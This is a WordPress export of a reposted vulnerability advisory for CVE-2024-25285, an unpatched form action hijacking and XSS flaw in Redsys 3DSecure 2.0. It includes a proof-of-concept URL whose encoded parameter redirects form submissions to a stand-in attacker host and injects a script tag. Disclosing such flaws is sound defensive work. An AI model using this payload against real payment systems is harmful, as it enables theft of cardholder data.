{"id":59624,"date":"2024-09-12T19:00:23","date_gmt":"2024-09-12T16:00:23","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181495\/3dsecure203dsma-xss.txt"},"modified":"2024-09-12T19:00:23","modified_gmt":"2024-09-12T16:00:23","slug":"3dsecure-2-0-3ds-method-authentication-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/3dsecure-2-0-3ds-method-authentication-cross-site-scripting\/","title":{"rendered":"3DSecure 2.0 3DS Method Authentication Cross Site Scripting"},"content":{"rendered":"<p>Product: 3DSecure 2.0<br \/>Manufacturer: Redsys<br \/>Affected Version(s): 3DSecure 2.0 3DS Method Authentication<br \/>Tested Version(s): 3DSecure 2.0 3DS Method Authentication<br \/>Vulnerability Type: Cross-Site Scripting (XSS)<br \/>Risk Level: Medium<br \/>Solution Status: Not yet fixed<br \/>Manufacturer Notification: 2024-01-17<br \/>Solution Date: N\/A<br \/>Public Disclosure: 2024-09-17<br \/>CVE Reference: CVE-2024-25285<\/p>\n<p>Overview:<br \/>3DSecure 2.0 is vulnerable to form action hijacking via the threeDSMethodNotificationURL parameter. This flaw allows attackers to change the destination website for form submissions, enabling data theft.<\/p>\n<p>Vulnerability Details:<br \/>The threeDSMethodNotificationURL parameter is vulnerable to modification, allowing attackers to redirect form submissions to malicious destinations.<\/p>\n<p>Proof of Concept (PoC):<br \/>By modifying the threeDSMethodNotificationURL parameter in a POST request, an attacker can change the form&#8217;s action URL. Example:<\/p>\n<p>https:\/\/sis-d.redsys.es\/sis-simulador-web\/threeDsMethod.jsp?threeDSMethodData=eyJ0aHJlZURTTWV0aG9kTm90aWZpY2F0aW9uVVJMIjoiaHR0cHM6Ly9hdHRhY2tlci5jb20iLCJ0aHJlZURTU2VydmVyVHJhbnNJRCI6IjM5NDA4Mzk2LTdjY2MtNGU4YS04NjU2LThmMTZlNmNlMDQ5OCJ9%3d%3dld4ga%22%3e%3cscript%3ealert(1)%3c%2fscript%3epsoojei88ze<\/p>\n<p>Solution:<br \/>No solution is currently available. Redsys has been notified.<\/p>\n<p>References:<br \/>OWASP Web Security Testing Guide: Form Action Hijacking<\/p>\n<p>Discoverer:<br \/>Reported by Rub\u00e9n L\u00f3pez Herrera<\/p>\n<p>________________________________<\/p>\n<p>Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener informaci\u00f3n privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilizaci\u00f3n, divulgaci\u00f3n y\/o copia sin autorizaci\u00f3n puede estar prohibida en virtud de la legislaci\u00f3n vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma v\u00eda y proceda a su destrucci\u00f3n.<\/p>\n<p>The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.<\/p>\n<p>Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinat\u00e1rio, pode conter informa\u00e7\u00e3o privilegiada ou confidencial e \u00e9 para uso exclusivo da pessoa ou entidade de destino. Se n\u00e3o \u00e9 vossa senhoria o destinat\u00e1rio indicado, fica notificado de que a leitura, utiliza\u00e7\u00e3o, divulga\u00e7\u00e3o e\/ou c\u00f3pia sem autoriza\u00e7\u00e3o pode estar proibida em virtude da legisla\u00e7\u00e3o vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destrui\u00e7\u00e3o<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Product: 3DSecure 2.0Manufacturer: RedsysAffected Version(s): 3DSecure 2.0 3DS Method AuthenticationTested Version(s): 3DSecure 2.0 3DS Method AuthenticationVulnerability Type: Cross-Site Scripting (XSS)Risk Level: MediumSolution Status: Not yet fixedManufacturer Notification: 2024-01-17Solution Date: N\/APublic Disclosure: 2024-09-17CVE Reference: CVE-2024-25285 Overview:3DSecure 2.0 is vulnerable to form action hijacking via the threeDSMethodNotificationURL parameter. This flaw allows attackers to change the destination website &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59624","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59624"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59624\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59624"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}